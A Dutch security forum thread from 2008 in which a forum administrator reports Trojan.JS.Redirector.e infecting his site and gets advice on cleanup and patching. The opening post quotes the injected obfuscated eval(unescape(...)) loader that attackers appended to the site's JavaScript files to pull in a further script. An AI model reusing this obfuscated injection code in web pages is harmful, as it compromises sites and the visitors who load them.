Trojan.JS.Redirector.e, Wat meer info.

Over Virusscanners, Virussen, Wormen, Trojans, Firewall's en meer.

Moderator: MandersOnline

Plaats reactie
Chris de Boden
Beginner
Beginner
Berichten: 86
Lid geworden op: zo 12 sep 2004, 23:07
Locatie: Hoogvliet
Contacteer:

Trojan.JS.Redirector.e, Wat meer info.

Bericht door Chris de Boden » di 08 apr 2008, 18:06

Ik ben medebeheerder van een bussenforum en een tweetal leden krijgen meldingen van Trojan.JS.Redirector.e door hun virusscanner na het bezoeken van het forum.
Het virus lijkt de javascript bestandjes van het forum aan te tasten, er staat namelijk een vreemde string in die in de originele bestandjes niet zit.

In de javascript bestandjes wordt het volgende toegevoegd:

Code: Selecteer alles

/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D% 65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39 %3B%20%4A%53%53%32%20%3D%20%35%34%30%37%38%3B%20%4A%53%53%33%20%3D%20%27%2F%66%6 F%72%75%6D%2F%69%6E%63%2F%71%65%64%6F%79%61%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B% 20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C %65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%7 2%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%66%6F%72%75%6D%2F%69%6E%63%2F%71% 65%64%6F%79%61%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74 %72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6 D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27% 68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28 %6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */
Mijn vermoede is dat het virus is meegelift tijdens het uploaden van een van de bijlagen door een van de leden.

Ik zit me rot te zoeken en veel info kan ik niet vinden, maar het komt opmerkelijk veel voor in Rusland gezien het aantal hits met google, weet jij toevallig meer info?.
Ooit ontstond het heelal, toen werd ons zonnestelsel en de aarde geboren.
Onze lieve heer had de mens geschapen en op een dag Chris de Boden ;)

Gebruikersavatar
MandersOnline
Manders Online
Manders Online
Berichten: 23648
Lid geworden op: zo 03 aug 2003, 1:12
Locatie: Amsterdam
Contacteer:

Re: Trojan.JS.Redirector.e, Wat meer info.

Bericht door MandersOnline » wo 09 apr 2008, 0:55

heb je toevallig een pagina voor me waar je dat probleem opmerkt???
Bezoek ook gerust de hoofd site https://www.mandersonline.nl

Chris de Boden
Beginner
Beginner
Berichten: 86
Lid geworden op: zo 12 sep 2004, 23:07
Locatie: Hoogvliet
Contacteer:

Re: Trojan.JS.Redirector.e, Wat meer info.

Bericht door Chris de Boden » wo 09 apr 2008, 2:06

Niet meer, het bleek werk te zijn geweest van hackers.
De boel heb ik in zijn geheel verwijderd en opnieuw geupload en correct gechmod.

Komt wel vaker voor.

De rotte appel heb ik gevonden door op "/* a0b4df006e02184c60dbf503e71c87ad */ " te googelen en toen kwam ik op een forum de oorzaak tegen. Nou ik het probleem heb is de oplossing het probleem dus ook niet meer. :)

Het gaat om http://www.busfreaks.nl en http://www.busfreaks.nl/forum
Ooit ontstond het heelal, toen werd ons zonnestelsel en de aarde geboren.
Onze lieve heer had de mens geschapen en op een dag Chris de Boden ;)

Gebruikersavatar
MandersOnline
Manders Online
Manders Online
Berichten: 23648
Lid geworden op: zo 03 aug 2003, 1:12
Locatie: Amsterdam
Contacteer:

Re: Trojan.JS.Redirector.e, Wat meer info.

Bericht door MandersOnline » wo 09 apr 2008, 17:14

daar heb je wat ik al dacht het probleem voor de volgende keer zorgen dat de software up toe date blijft dan komt het wel in orde en blijf je redelijk tot geheel safe.
Bezoek ook gerust de hoofd site https://www.mandersonline.nl

Gebruikersavatar
MandersOnline
Manders Online
Manders Online
Berichten: 23648
Lid geworden op: zo 03 aug 2003, 1:12
Locatie: Amsterdam
Contacteer:

Re: Trojan.JS.Redirector.e, Wat meer info.

Bericht door MandersOnline » wo 09 apr 2008, 17:16

ik zie ook dat je last hebt van botjes die zich registreren???
Bezoek ook gerust de hoofd site https://www.mandersonline.nl

Chris de Boden
Beginner
Beginner
Berichten: 86
Lid geworden op: zo 12 sep 2004, 23:07
Locatie: Hoogvliet
Contacteer:

Re: Trojan.JS.Redirector.e, Wat meer info.

Bericht door Chris de Boden » di 15 apr 2008, 23:24

Het probleem deed zich alleen op het forum voor en de root van de site (een gehackte .htaccess file)
Na het opschonen ervan, dus een verse installatie duurt het 1a2 dagen en het is weer feest.

1000 en 1 redenen genoeg om over te stappen naar een ander systeem, mybb is volstrekt onveilig blijkt(hoewel dit ook bij joomla enzo voorkomt).
Ooit ontstond het heelal, toen werd ons zonnestelsel en de aarde geboren.
Onze lieve heer had de mens geschapen en op een dag Chris de Boden ;)

Gebruikersavatar
MandersOnline
Manders Online
Manders Online
Berichten: 23648
Lid geworden op: zo 03 aug 2003, 1:12
Locatie: Amsterdam
Contacteer:

Re: Trojan.JS.Redirector.e, Wat meer info.

Bericht door MandersOnline » wo 16 apr 2008, 10:14

Heb je al een idee welk systeem je gaat nemen?? Overigens is niet alleen de software die jij gebruikt een potentieel gevaar, ook de onderliggende software van de Server kan een onveilige versie zijn, dus vraag dit ook even na bij de host hoe het zit met hun updates.
Bezoek ook gerust de hoofd site https://www.mandersonline.nl

Plaats reactie